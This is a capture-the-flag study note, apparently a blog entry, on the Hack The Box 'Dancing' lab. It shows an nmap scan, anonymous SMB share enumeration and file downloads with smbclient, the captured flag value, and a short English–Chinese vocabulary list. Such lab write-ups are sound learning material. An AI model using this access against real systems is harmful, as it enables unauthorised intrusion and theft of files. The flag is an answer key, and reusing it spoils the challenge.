HTB-Dancing
#HTB #笔记 #STARTING POINT 2023-07-03

SMB = Server Message Block

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
ubuntu@ip:~$ nmap -sV 10.129.166.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 10:00 UTC
Nmap scan report for ip-10-129-166-135.us-west-1.compute.internal (10.129.166.135)
Host is up (0.076s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds

ubuntu@ip:~$ smbclient -L 10.129.166.135
Password for [WORKGROUP\ubuntu]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
SMB1 disabled -- no workgroup available

ubuntu@ip:~$ smbclient \\\\10.129.166.135\\WorkShares
Password for [WORKGROUP\ubuntu]:
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              

smb: \> ls
  .                                   D        0  Mon Mar 29 08:22:01 2021
  ..                                  D        0  Mon Mar 29 08:22:01 2021
  Amy.J                               D        0  Mon Mar 29 09:08:24 2021
  James.P                             D        0  Thu Jun  3 08:38:03 2021

                5114111 blocks of size 4096. 1752067 blocks available

smb: \> cd Amy.J\
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 09:08:24 2021
  ..                                  D        0  Mon Mar 29 09:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 11:00:37 2021

                5114111 blocks of size 4096. 1752067 blocks available

smb: \Amy.J\> get worknotes.txt 
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

smb: \Amy.J\> cd ..

smb: \> ls
  .                                   D        0  Mon Mar 29 08:22:01 2021
  ..                                  D        0  Mon Mar 29 08:22:01 2021
  Amy.J                               D        0  Mon Mar 29 09:08:24 2021
  James.P                             D        0  Thu Jun  3 08:38:03 2021

                5114111 blocks of size 4096. 1752067 blocks available

smb: \> cd James.P\

smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 08:38:03 2021
  ..                                  D        0  Thu Jun  3 08:38:03 2021
  flag.txt                            A       32  Mon Mar 29 09:26:57 2021

                5114111 blocks of size 4096. 1752051 blocks available

smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)

smb: \James.P\> exit

ubuntu@ip:~$ ls
flag.txt  lab_KILLMEN.ovpn  lab_KILLMEN1.ovpn  snap  starting_point_KILLMEN.ovpn  worknotes.txt

ubuntu@ip:~$ cat worknotes.txt 
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing ubuntu@ip-172-31-17-119:~$ 

ubuntu@ip:~$ cat flag.txt 
5f61c10dffbc77a704d76016a22f1664

第三关Pwned!

One of these 其中一个;其中之一
serial ports 串行端口
reserved for 保留给
authentication n. 认证;鉴定;身份验证
Hypothetically 假设;假设地;假定地;假想
alongside prep. 与…一起;在…旁边;与…同时;沿着 adv. 在…旁边;与…并排;在…的侧面
tactic n. 战术;策略;手段;兵法;招数 adj. 排列的,顺序的;<化>有规立构的;<生>(有)趋性的
prone adj. 俯卧的;易于遭受…的;易于遭受;有做…倾向的;有做(坏事)的倾向
directories n. (计算机文件或程序的)目录;名录;电话号码簿;公司名录